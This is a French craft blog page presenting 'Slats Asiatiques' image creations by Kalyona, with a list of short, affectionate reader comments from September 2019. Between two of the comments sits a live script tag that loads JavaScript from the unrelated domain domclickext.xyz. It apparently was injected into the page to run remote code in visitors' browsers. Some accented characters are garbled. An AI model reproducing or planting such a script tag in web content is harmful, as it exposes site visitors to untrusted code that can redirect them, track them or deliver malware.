• **Slats Asiatiques** de chez Kalyona

     

    **Slats Asiatiques** de chez Kalyona

     

     

    **Slats Asiatiques** de chez Kalyona

    sur un air d orient **Slats Asiatiques** de chez Kalyona

     

    bonjour

     

     

    **Slats Asiatiques** de chez Kalyona

     

     

    soyez sages

     

     **Slats Asiatiques** de chez Kalyona

    la c?r?monie du th?

     

    **Slats Asiatiques** de chez Kalyona

     

     

    « **L' Automne 2019 s'en vient**Cartes**Défis 19, 20 et 21**de Kaly (2019) »
    Pin It

  • Commentaires

    7
    Vendredi 27 Septembre 2019 à 14:44

    Bonjour ma douce Selly

    Merci pour tes visites, j'espère que tu vas bien

    et je te souhaite une bonne après-midi et un agréable week-end

    gros bisous

    ton amie Janine

    6
    Vendredi 27 Septembre 2019 à 11:32

    Coucou ma SELLY,

    Encore BRAVO pour ces belles créations avec les slats de notre amie. Une petite création cadeau où tu vois les oies qui commencent à déserter notre rivage lol !

    Je te souhaite un délicieux WE, avec de belles journées. Ici beau aujourd'hui, mais après... les turbulences !!

    A bientôt et mille bisous tendres (tu vas avoir les joues usées mdr !)

    Coryphee

    5
    Jeudi 26 Septembre 2019 à 21:02

    Un petit coucou

    pour te souhaiter une agréable nuit

    bisous line

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    4
    Jeudi 26 Septembre 2019 à 17:29

    Bonjour ma douce Selly

    Une belle réussite pour les slats de notre amie Kalyona

    Bonne soirée et gros bisous

    ton amie Janine

    3
    Jeudi 26 Septembre 2019 à 16:55

    j'aime bien ce style de créa !! bravo

    bisous

    2
    Jeudi 26 Septembre 2019 à 10:42

    Coucou ma Douce !

    OH ! c'est très beau tout cela ma bichette, BRAVO pour ton talent de créatrice. J'aime beaucoup.

    Je te souhaite une belle journée. Ici, elle sera maussade avec un ciel bas. Mais bon ! J'espère que tout va bien pour toi et je te dis à bientôt !

    Je vais me "remettre au boulot" mdr !

    Bisous, bisous tendres. Coryphee

    1
    Jeudi 26 Septembre 2019 à 08:45

    bonjour Sella

    Super belles créations

    bonne journée bisous 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :